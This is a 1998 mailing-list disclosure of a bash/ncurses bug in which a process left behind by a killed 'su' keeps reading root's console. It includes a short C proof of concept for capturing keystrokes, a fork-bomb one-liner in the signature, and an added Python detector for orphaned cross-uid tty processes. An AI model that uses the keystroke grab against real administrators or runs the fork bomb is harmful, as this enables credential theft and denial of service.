bash 2.01 / ncurses 4.1 console takeover "feature"

Michal Zalewski (lcamtuf@BOSS.STASZIC.WAW.PL)
Sat, 07 Mar 1998 21:06:21 +0100

With bash 2.01 and ncurses 4.1, any program launched at unprivileged
uid (e.g. from 'su' shell) may take over privileged user's console
(to grab keystrokes or something else). I found it's quite easy when
I tried to kill 'su' directly from unprivileged shell with signal 9:

[root@genome /]# su lcam
[lcam@genome /]$ killall -9 su
Killed
[root@genome /]#

That was normal, but suddenly I saw again old prompt:

[lcam@genome /]$

From this point, two bash instances (unprivileged one hasn't been
killed with su!) were controlling my console at once... It looks
just curious:

[root@genome /]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[lcam@genome /]$ id
uid=502(lcam) gid=502(lcam) groups=502(lcam)
[lcam@genome /]$
[root@genome /]#

Of course, it isn't so scary, because it has been done manually...
But it can be easily used in nasty program. Typical administrator
believes that only unprivileged account may be compromised when
he's launching something on it, and usually he's right, but
ncurses has a vulnerability which may be used to fool him. Unlike
other lame su tricks, it's quite invisible (he may check on a
second console - he's back in his REAL, root shell, but we can
still control his console). I wrote simple program (it may be even
launched from ~/.bashrc; in the meantime, su should be killed), which
is able to grab keystroke(s) from console:

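-- test.c --
// gcc test.c -lncurses -oanything
#include <curses.h>
#include <stdlib.h>   /* system() */

int main() {
    initscr();   /* attach curses to the controlling terminal */
    noecho();    /* do not echo typed characters */
    raw();       /* deliver keys unbuffered, without signal processing */
    /* drop a marker file when 'x' is read from the console */
    while (1) if (getch()=='x') system("touch /tmp/VOILA");
}
-- eof --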

It isn't perfect, actually it grabs only one of first 'x's, and fails
to grab next ones (a lot of i/o errors when debugged ;-). But it
CAN do that. For sure it's possible to keep control much longer, as
shown above (bash example). Maybe it's even possible to do it even
after logout, I have not checked it.

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
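
A detection check for the condition shown in the post, added here as an example and not part of the original message: it flags a process that is still attached to a terminal under a different uid than that terminal's session leader after its parent (the killed 'su') has gone. The ps column set, the sample listing and the function names are assumptions of this example; on systems with a subreaper the orphan's new parent may not be pid 1, so the check tests only whether the parent is still on the same tty.

```python
import subprocess
from collections import defaultdict

# Constructed sample of `ps -eo pid,ppid,uid,sid,tty,comm` output (not from the post).
# tty1: the state after 'killall -9 su'; tty2: an ordinary, intact 'su' session.
SAMPLE_PS = """\
  PID  PPID   UID   SID TT       COMMAND
  900   812     0   900 tty1     bash
  950     1   502   900 tty1     bash
 1000   813     0  1000 tty2     bash
 1040  1000     0  1000 tty2     su
 1041  1040   502  1000 tty2     bash
 1100     1     0  1100 ?        sshd
"""

def parse_ps(text):
    """Turn the ps listing into dicts, skipping the header and short lines."""
    procs = []
    for line in text.splitlines()[1:]:
        f = line.split(None, 5)
        if len(f) < 6:
            continue
        pid, ppid, uid, sid = map(int, f[:4])
        procs.append({"pid": pid, "ppid": ppid, "uid": uid, "sid": sid,
                      "tty": f[4], "comm": f[5].strip()})
    return procs

def find_orphans_on_tty(text):
    """Return (tty, pid, uid, comm, leader_uid) for each process that shares a
    session leader's terminal under another uid while its parent is gone."""
    by_tty = defaultdict(list)
    for p in parse_ps(text):
        if p["tty"] not in ("?", "-"):          # only processes with a terminal
            by_tty[p["tty"]].append(p)
    findings = []
    for tty, procs in by_tty.items():
        pids = {p["pid"] for p in procs}
        leaders = {p["sid"]: p["uid"] for p in procs if p["pid"] == p["sid"]}
        for p in procs:
            leader_uid = leaders.get(p["sid"])
            if leader_uid is None or p["uid"] == leader_uid:
                continue                        # same owner as the session leader
            if p["ppid"] not in pids:           # parent no longer on this tty
                findings.append((tty, p["pid"], p["uid"], p["comm"], leader_uid))
    return findings

if __name__ == "__main__":
    live = subprocess.run(["ps", "-eo", "pid,ppid,uid,sid,tty,comm"],
                          capture_output=True, text=True, check=True).stdout
    for hit in find_orphans_on_tty(live):
        print("tty=%s pid=%d uid=%d comm=%s leader_uid=%d" % hit)
```
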